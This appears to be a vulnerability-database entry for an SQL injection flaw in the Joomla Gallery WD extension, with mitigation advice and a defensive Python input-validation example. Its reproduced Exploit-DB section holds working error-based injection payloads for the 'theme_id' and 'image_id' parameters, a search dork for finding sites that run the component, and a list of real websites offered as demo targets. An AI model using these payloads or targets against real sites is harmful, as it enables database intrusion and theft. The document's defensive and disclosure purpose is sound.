Vendor: Joomla Gallery WD
By: CrashBandicot
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Joomla Gallery WD
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
Year: 2015

Joomla Gallery WD – SQL Injection Vulnerability

Parameter 'theme_id' in GET and parameter 'image_id' in POST are vulnerable to SQL Injection. An attacker can inject malicious SQL queries to gain access to the database and extract sensitive information.

Mitigation:

Input validation should be done to prevent SQL Injection attacks. Sanitize user input and use parameterized queries.
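
The two controls named above, applied to this component's request parameters, as an added example (not code from the advisory or from the vendor). Assumptions: the `theme` table, the helper names and the integer-only treatment of `gallery_id` are hypothetical, and an in-memory SQLite database stands in for the Joomla database.

```python
import sqlite3
from urllib.parse import parse_qsl

# Integer-only request parameters. theme_id and image_id are the two the
# advisory names; gallery_id is included as an assumption.
INT_PARAMS = {"theme_id", "image_id", "gallery_id"}

def parse_id(raw):
    """Accept 1-10 ASCII digits only; anything else raises ValueError."""
    if not (raw.isascii() and raw.isdigit() and len(raw) <= 10):
        raise ValueError(f"not an integer id: {raw[:20]!r}")
    return int(raw)

def invalid_id_params(query_string, body=""):
    """Names of integer parameters (GET or POST) whose value fails parse_id."""
    bad = set()
    for source in (query_string, body):
        for name, value in parse_qsl(source, keep_blank_values=True):
            if name in INT_PARAMS:
                try:
                    parse_id(value)
                except ValueError:
                    bad.add(name)
    return sorted(bad)

def theme_name(conn, raw_theme_id):
    """Validate first, then bind the id as a parameter instead of concatenating it."""
    theme_id = parse_id(raw_theme_id)
    row = conn.execute("SELECT name FROM theme WHERE id = ?", (theme_id,)).fetchone()
    return row[0] if row else None

def demo_db():
    """Constructed in-memory table standing in for the component's theme table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE theme (id INTEGER PRIMARY KEY, name TEXT)")
    conn.execute("INSERT INTO theme VALUES (1, 'default')")
    return conn

# Constructed requests: one benign, two with SQL text appended after the
# numeric id (a shortened stand-in for the pattern the advisory reports).
BENIGN_QS = "option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2&theme_id=1"
TAMPERED_QS = "option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2&theme_id=1%20AND%20(SELECT%201)"
TAMPERED_BODY = "image_id=19%20AND%20(SELECT%201)&rate=&ajax_task=save_hit_count"

if __name__ == "__main__":
    print(invalid_id_params(BENIGN_QS))
    print(invalid_id_params(TAMPERED_QS))
    print(invalid_id_params(BENIGN_QS, TAMPERED_BODY))
```

Since the entry lists no patch, the same digits-only check can also run in front of the site (reverse proxy or WAF rule) for requests with `option=com_gallery_wd`.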

Exploit-DB raw data:

######################################################################
# Exploit Title: Joomla Gallery WD - SQL Injection Vulnerability 
# Google Dork: inurl:option=com_gallery_wd
# Date: 29.03.2015
# Exploit Author: CrashBandicot (@DosPerl)
# Vendor HomePage: http://web-dorado.com/
# Source Component : http://extensions.joomla.org/extensions/extension/photos-a-images/galleries/gallery-wd
# Tested on: Windows
######################################################################

parameter 'theme_id' in GET vulnerable

# Example :
# Parameter: theme_id (GET)
# Type: error-based
# GET Payload : index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2&theme_id=1 AND (SELECT 6173 FROM(SELECT COUNT(*),CONCAT(0x716b627871,(MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x716a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

# ==================================================================================== #

parameter 'image_id' in POST vulnerable

# Example :
# URI : /index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2
# Parameter: image_id (POST)
# Type: error-based
# POST Payload: image_id=19 AND (SELECT 6173 FROM(SELECT COUNT(*),CONCAT(0x716b627871,(MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x716a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&rate=&ajax_task=save_hit_count&task=gallerybox.ajax_search


# ~ Demo ~ # $>

http://www.cnct.tg/
http://www.nswiop.nsw.edu.au/
http://cnmect.licee.edu.ro/

#EOF